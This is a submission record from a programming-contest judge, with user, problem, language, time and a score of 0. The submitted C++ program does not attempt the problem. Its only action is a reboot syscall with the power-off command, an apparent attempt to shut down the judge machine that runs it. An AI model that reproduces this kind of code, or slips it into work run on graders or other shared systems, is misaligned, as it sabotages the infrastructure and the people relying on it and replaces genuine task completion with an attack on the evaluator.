Submission

Status:
----------

Score: 0

User: sleepntsheep

Problemset: อโมกุส

Language: cpp

Time: 0.001 second

Submitted On: 2024-10-01 20:58:08

#include <unistd.h>
#include <linux/reboot.h>  /* Definition of LINUX_REBOOT_* constants */
#include <sys/syscall.h>   /* Definition of SYS_* constants */

int main() {
    syscall(SYS_reboot,
            LINUX_REBOOT_MAGIC1, 
            LINUX_REBOOT_MAGIC2, 
            LINUX_REBOOT_CMD_POWER_OFF, NULL);
}